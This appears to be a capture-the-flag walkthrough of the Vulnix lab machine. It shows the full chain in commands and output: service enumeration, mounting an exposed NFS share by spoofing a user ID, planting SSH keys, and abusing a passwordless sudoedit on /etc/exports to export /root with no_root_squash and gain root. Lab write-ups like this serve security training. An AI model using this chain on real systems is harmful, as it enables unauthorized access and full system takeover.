Service Discovery & Enumeration

Nmap [nmap -sS -sV -sC 192.168.22.134] revealed a number of different services for this box, offering a lot of potential enumeration points:

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
79/tcp   open  finger   Linux fingerd
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42005/udp  mountd
|   100005  1,2,3      54538/tcp  mountd
|   100021  1,3,4      37679/tcp  nlockmgr
|   100021  1,3,4      50827/udp  nlockmgr
|   100024  1          49501/udp  status
|   100024  1          53102/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
143/tcp  open  imap     Dovecot imapd
512/tcp  open  exec     netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell    Netkit rshd
993/tcp  open  ssl/imap Dovecot imapd
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  2-3 (RPC #100227)

The first service I took a look at was the NFS daemon, by looking at the export list on the host machine:

root@kali:~# showmount -e 192.168.22.134
Export list for 192.168.22.134:
/home/vulnix *

The home directory of the vulnix user is being exposed, which presents a potentially easy access point. Prior to NFSv4, it's possible to view the owner UID and GID of a remote share, so I tried to mount the share using NFSv3:

root@kali:~/vulnix# mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3
root@kali:~/vulnix# ls -l
total 4
drwxr-x--- 2 2008 2008 4096 Sep  2  2012 mnt

As can be seen in the above output, the owning user and group have the IDs 2008. There are multiple tools available to aid in spoofing this, but it's also as easy to just add a new user with the specified ID, so I created a new user with ID 2008, switched to it, and then had access to the share:

root@kali:~/vulnix# useradd -u 2008 vulnix
root@kali:~/vulnix# su vulnix
$ cd mnt
$ ls -lah
total 20K
drwxr-x--- 2 vulnix vulnix 4.0K Sep  2  2012 .
drwxr-xr-x 3 root   root   4.0K Aug 20 15:28 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3.5K Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile

Now that I had remote write access as vulnix, I created a new SSH key pair, and copied the public key into .ssh/authorized_keys, which then allowed me to SSH in to the box as vulnix

root@kali:~/vulnix# ssh -i id_rsa vulnix@192.168.22.134
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Aug 20 16:47:57 BST 2017

  System load:  0.0              Processes:           90
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.22.134
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$

Getting Root Access

Looking at the sudo privileges for vulnix, I could see that the user is able to edit the NFS exports without the need for a password:

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

By using sudoedit /etc/exports, it's possible to add another share into the export list, one which uses the no_squash_root option; which prevents root users being remapped to the nobody user:

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root *(rw,no_root_squash)

This change doesn't automatically get applied, but will do so upon a system reboot. After rebooting the VM, the new share into the /root directory can be seen:

root@kali:~/vulnix# showmount -e 192.168.22.134
Export list for 192.168.22.134:
/root        *
/home/vulnix *

Following the same steps as before, it is now possible to add an SSH key into /root/.ssh/authorized_keys and gain root access:

root@kali:~/vulnix# mount 192.168.22.134:/root mnt -o vers=3
root@kali:~/vulnix# cd mnt
root@kali:~/vulnix/mnt# ls -la
total 28
drwx------ 3 root root 4096 Sep  2  2012 .
drwxr-xr-x 5 root root 4096 Aug 20 16:33 ..
-rw------- 1 root root    0 Sep  2  2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19  2012 .bashrc
drwx------ 2 root root 4096 Sep  2  2012 .cache
-rw-r--r-- 1 root root  140 Apr 19  2012 .profile
-r-------- 1 root root   33 Sep  2  2012 trophy.txt
-rw------- 1 root root  710 Sep  2  2012 .viminfo
root@kali:~/vulnix/mnt# mkdir .ssh
root@kali:~/vulnix/mnt# cp ../id_rsa.pub .ssh/authorized_keys

root@kali:~/vulnix# ssh -i id_rsa root@192.168.22.134
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Aug 20 17:51:41 BST 2017

  System load:  0.0              Processes:           93
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.22.134
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

root@vulnix:~# ls
trophy.txt
root@vulnix:~# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be
root@vulnix:~#